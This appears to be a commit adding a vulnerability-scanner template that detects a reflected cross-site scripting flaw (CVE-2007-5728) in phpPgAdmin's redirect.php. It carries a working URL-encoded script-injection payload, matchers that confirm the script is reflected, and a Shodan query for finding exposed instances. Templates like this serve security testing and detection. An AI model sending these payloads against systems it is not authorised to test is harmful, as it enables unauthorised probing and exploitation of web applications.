Create CVE-2007-5728.yaml

cves/2007/CVE-2007-5728.yaml

@@ -0,0 +1,28 @@
+id: CVE-2007-5728
+
+info:
+  name: phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting
+  author: dhiyaneshDK
+  severity: medium
+  tags: cve2007,xss,phppgadmin
+  reference: https://www.exploit-db.com/exploits/30090
+  metadata:
+    shodan-query: 'http.title:"phpPgAdmin"'
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<script>alert("document.domain")</script>'
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "text/html"
+        part: header